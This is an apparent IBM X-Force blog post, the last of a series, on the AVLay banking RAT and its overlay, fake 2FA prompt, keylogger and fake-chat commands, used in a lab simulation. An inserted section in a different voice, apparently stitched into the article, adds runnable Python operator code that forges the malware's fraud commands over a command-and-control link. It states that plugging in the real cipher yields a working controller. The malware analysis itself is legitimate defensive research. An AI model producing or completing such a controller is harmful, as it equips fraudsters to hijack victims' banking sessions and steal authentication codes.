This is the third installment in a three-part series on the AVLay RAT discovered by IBM X-Force. Parts one and two explained how the researchers reverse engineered the malware. This installment will demonstrate how X-Force gained control of AVLay and fully simulated the overlay attack in its labs.

To simulate AVLay attacks in our labs, we began by writing our own Python server to listen for incoming connections from the Brazilian Delphi-based malware. The server reproduces the encryption and parsing layers used by AVLay itself, so it can decrypt the messages the client sends and forge messages that the malware client will accept and execute. This was the first step in gaining control over AVLay's functionality.

Our Python server also requested screenshots from the infected machines, parsed the images AVLay sent back, and displayed them in a graphical user interface. This let us drive the victim's desktop in much the same way a standard remote-session tool would.

With the server in place, we were able to exercise the various command-and-control (C&C) commands found in the code and observe how each one behaves on the infected machine.

Simulating a Remote Access Trojan (RAT) in Our Labs

AVLay targets a variety of online banking and other financial applications. In our lab demo, we focused on a cryptocurrency trading platform in Brazil. The image below shows our Python server displaying the view of the victim’s desktop. The terminal is displaying the commands that we implemented in our server.

Figure 1: Our Python server showing screenshots from the victim’s machine (Source: IBM Security)

AVLay does have additional commands for controlling a victim’s machine that are not mentioned in this article, including commands to enable and disable the keylogger, self-terminate the malware process, create custom overlay forms by selecting parts of the window, and more.

The Overlay

The core functionality of the AVLay malware is its ability to launch an overlay attack. This capability relies on the FRAMEFZSYS command for activating overlay screens and FRAMEUFSYS for hiding them.

When the overlay is active, it blocks the victim from interacting with the application they were using while the attacker takes control of the device. The attacker, who can still see the windows underneath the overlay, uses the remote access capability to send mouse clicks and keystrokes to the machine over the network. This lets the attacker log in to the targeted bank's site from the victim's own session and initiate fraudulent transactions.

The image below shows the view on a victim’s machine when an overlay is activated:

Figure 2: Victim’s view when the overlay is activated and control over the machine is blocked (Source: IBM Security)

The image below shows the view from the attacker’s device while controlling the victim’s session:

Figure 3: Attacker’s view when the overlay is activated and the attacker has full remote control over the machine (Source: IBM Security)

Two-Factor Authentication Bypass

AVLay has built-in overlay screens designed to prompt the victim for two-factor authentication (2FA) codes. With a single command, COINP1 or COINP2, an attacker can swiftly adjust the overlay to demand the additional fields a given transaction requires.

The malware also has a built-in keylogging feature that is switched on with the EDKLSYS command. The following two AVLay images show the fake web forms that can be used in fraud attacks:

Figure 4: Fake window for bypassing 2FA via email verification (Source: IBM Security)

Figure 5: Fake window for bypassing 2FA via Google Authenticator (Source: IBM Security)

Fake Chat Window for Real-Time Lies

A recent feature that enables fraudsters to chat with victims in real time was added to AVLay as an additional channel for live social engineering.

The rogue chat window appears to originate from the fake page, and since that page looks like the bank's page, some users may be duped into communicating with the criminal while their account is being taken over.

AVLay's chat window is opened with the OPENCSYS command and closed with CLOSCSYS. The attacker can manipulate the victim by sending chat messages with the TEXTCSYS command.

Figure 6: Fake chat window as an additional channel of social engineering (Source: IBM Security)
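To make the server described at the start of this installment and the commands listed in the sections above concrete, here is an added example (not X-Force's server; the real encryption layer was covered in parts one and two) of how a lab controller for the recovered command vocabulary can be structured in Python. It has three parts: a length-prefixed framing layer with a placeholder XOR "cipher" standing in for the real one, a stream parser that copes with TCP delivering half a frame, and an operator session that forges FRAMEFZSYS/FRAMEUFSYS, COINP1/COINP2, EDKLSYS and OPENCSYS/TEXTCSYS/CLOSCSYS frames while tracking the state they imply on the victim. Only the command names come from the article; the wire framing, the argument layout, the key and the cipher are assumptions made so the example runs offline.

```python
"""Lab controller for a RAT whose command vocabulary came from reverse engineering.

Added example, not X-Force's code. The command names are the ones in the
article; framing, argument layout, key and cipher are assumed.
"""
import socket
import struct

# Stand-in for the real encryption layer. Repeating-key XOR is NOT the
# malware's cipher; it only lets the encrypt/parse/forge pipeline run here.
LAB_KEY = b"lab-only-key"  # assumed


def xor_layer(data: bytes, key: bytes = LAB_KEY) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


# Assumed wire format: 4-byte big-endian length, then the encrypted body
# "COMMAND|arg1|arg2..." in UTF-8. Length-prefixing means no delimiter byte
# has to be found inside ciphertext.
def pack(command: str, *args: str) -> bytes:
    if any("|" in a for a in args):
        raise ValueError("'|' is the field separator in this lab format")
    body = xor_layer("|".join((command, *args)).encode("utf-8"))
    return struct.pack(">I", len(body)) + body


def unpack_stream(buf: bytes):
    """Return ([(command, args), ...], unconsumed_tail) for a byte buffer.
    A frame whose length prefix promises more bytes than are present is left
    in the tail, so the caller can append the next recv() and retry."""
    msgs = []
    while len(buf) >= 4:
        (n,) = struct.unpack(">I", buf[:4])
        if len(buf) < 4 + n:
            break                       # partial frame: wait for more bytes
        fields = xor_layer(buf[4:4 + n]).decode("utf-8").split("|")
        msgs.append((fields[0], fields[1:]))
        buf = buf[4 + n:]
    return msgs, buf


class OperatorSession:
    """Builds the frames an operator sends and tracks the state they imply."""

    def __init__(self, sock=None):
        self.sock = sock
        self.overlay = False
        self.keylogger = False
        self.chat_open = False
        self.log = []                    # every (command, args) sent

    def _send(self, command: str, *args: str) -> bytes:
        frame = pack(command, *args)
        self.log.append((command, list(args)))
        if self.sock is not None:
            self.sock.sendall(frame)
        return frame

    def show_overlay(self):              # FRAMEFZSYS: activate the overlay
        self.overlay = True
        return self._send("FRAMEFZSYS")

    def hide_overlay(self):              # FRAMEUFSYS: hide it again
        self.overlay = False
        return self._send("FRAMEUFSYS")

    def request_code(self, slot: int):   # COINP1 / COINP2: add a 2FA field
        if not self.overlay:
            raise RuntimeError("no overlay active; send FRAMEFZSYS first")
        if slot not in (1, 2):
            raise ValueError("AVLay exposes COINP1 and COINP2 only")
        return self._send("COINP%d" % slot)

    def enable_keylogger(self):          # EDKLSYS
        self.keylogger = True
        return self._send("EDKLSYS")

    def open_chat(self):                 # OPENCSYS
        self.chat_open = True
        return self._send("OPENCSYS")

    def chat(self, text: str):           # TEXTCSYS + message (layout assumed)
        if not self.chat_open:
            raise RuntimeError("chat window not open; send OPENCSYS first")
        return self._send("TEXTCSYS", text)

    def close_chat(self):                # CLOSCSYS
        self.chat_open = False
        return self._send("CLOSCSYS")


def lab_run():
    """Drive a full overlay sequence over a local socket pair and decode what
    the 'victim' end received. Returns the decoded (command, args) list."""
    operator_end, victim_end = socket.socketpair()
    op = OperatorSession(operator_end)
    op.show_overlay()
    op.request_code(1)
    op.enable_keylogger()
    op.open_chat()
    op.chat("lab test message")          # constructed, not a real lure
    op.close_chat()
    op.hide_overlay()
    operator_end.close()
    received = b""
    chunk = victim_end.recv(4096)
    while chunk:
        received += chunk
        chunk = victim_end.recv(4096)
    victim_end.close()
    msgs, tail = unpack_stream(received)
    if tail:
        raise RuntimeError("truncated frame on the wire")
    return msgs


if __name__ == "__main__":
    for cmd, args in lab_run():
        print(cmd, args)
```

The point of keeping `unpack_stream` separate from the socket loop is that the real server reads from a TCP stream, where a screenshot or a command can arrive split across several `recv()` calls; carrying the unconsumed tail forward is what makes the parsing layer robust. Swapping `xor_layer` for the malware's actual cipher and `pack` for its real field layout is what turns this skeleton into a working controller.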

Break One, Stop Many

In this three-part series, we demonstrated how reverse engineering a Brazilian Delphi malware family lets an analyst build a server that controls it. While we demonstrated it on AVLay, the methods and tools we used here can be reused to analyze other malware families circulating in Latin America.

By fully controlling malware that plagues a large user base, we can better understand its underlying abilities and counter them.
